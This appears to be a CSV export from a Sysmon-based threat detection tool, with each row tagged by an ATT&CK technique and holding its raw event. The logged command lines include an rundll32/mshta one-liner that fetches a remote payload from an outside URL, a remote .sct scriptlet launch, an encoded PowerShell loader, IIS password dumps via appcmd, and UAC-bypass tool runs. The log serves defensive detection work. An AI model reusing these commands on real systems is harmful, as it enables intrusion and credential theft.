00247C92-09FE-5F86-0000-001051841401 + 1716 + C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5928 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.472 + 365ABB72-3D6E-5CEB-0000-0010CC99FF00 + 344 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16249 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:40.164 + 365ABB72-69A8-5CD7-0000-0010C0982200 + 3792 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /delete /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5410 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.702 + 747F3D96-6EA5-5D45-0000-00108FD3E100 + 7844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-0010EED0E100 + 4768 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5308 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:51:47.872 + 747F3D96-6743-5D45-0000-001068D7B500 + 6456 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6742-5D45-0000-00104A66B500 + 6380 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 32 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196442 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AC861401 + 6372 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-09FE-5F86-0000-001051841401 + 1716 + C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-4F8A-5CE3-0000-0010C5BB4800 + 3548 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429137 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:13.976 + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + 10.0.18362.1316 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 00247C92-1749-6010-0000-0010348FD92E + 2988 + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5979 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.084 + 365ABB72-3D70-5CEB-0000-0010F2DEFF00 + 2772 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16248 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.289 + 365ABB72-69A3-5CD7-0000-00109D7F2200 + 1860 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-DC77-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-69A3-5CD7-0000-001064792200 + 3432 + C:\Windows\System32\taskeng.exe + taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4902 + + + + + 